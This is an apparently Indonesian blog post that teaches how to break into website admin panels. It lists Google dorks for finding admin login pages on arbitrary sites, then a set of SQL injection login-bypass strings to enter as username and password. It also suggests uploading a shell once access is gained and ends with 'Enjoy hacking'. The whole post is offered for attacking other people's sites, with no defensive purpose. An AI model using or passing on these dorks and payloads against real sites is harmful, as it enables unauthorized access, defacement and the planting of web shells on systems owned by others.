Banyak cara untuk masuk sebagai admin website dan kita bisa melakukan apa yang kita inginkan ketika kita menjadi admin web tersebut bisa update berita, mengganti isi link , mengganti isi seluruh halaman web tersebut. Banyak sebagian hacker menggunakan berbagai teknik untuk bisa mendapatkan username dan password admin web salah satunya adalah teknik SQLi (Structured Query Language Injection) dengan memasukan query SQli pada username dan password kita pun bisa masuk sebagai admin web tersebut. Dengan bantuan mesin pencari No. 1 yaitu google kita memasukan keyword Google dork kita bisa mendapatkan username dan password dari data web.
Sebelum anda melakukan SQL Injection pasti anda harus tahu web Administrator untuk melakukan hal itu, saya akan memberikan sedikit Dork kepada anda untuk mencari web Administrator atau anda juga bisa membaca artikel saya yang sebelumnya Cara menemukan web admin untuk menemukan halaman administrator.
Anda bisa menggunakan Dork berikut untuk melakukan SQl Injection :
inurl:adminlogin.aspx
inurl:adminlogin.asp
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:login.php
inurl:admin/index.php
Maka anda akan mendapatkan banyak sekali situs yang menyerupai halaman admin sesuai dengan Dork yang anda masukan .
Setelah anda berhasil menemukan halaman admin anda bisa menggunakan Query SQl di bawah ini secara default.
Username : 1′or’1′=’1
Password : 1′or’1′=’1
Atau
Username : Admin
Password : 1′or’1′=’1
Jika anda berhasil anda bisa melakukan apa yang anda inginkan pada halaman situs tersebut atau anda juga bisa mengupload Shell.
Query lain Injection Code :
1′or’1′=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’=’x
” or “x”=”x
‘) or (‘x’=’x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’=’a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’=’a
hi’) or (‘a’=’a
hi”) or (“a”=”)
Enjoy hacking,,,,
0 comments: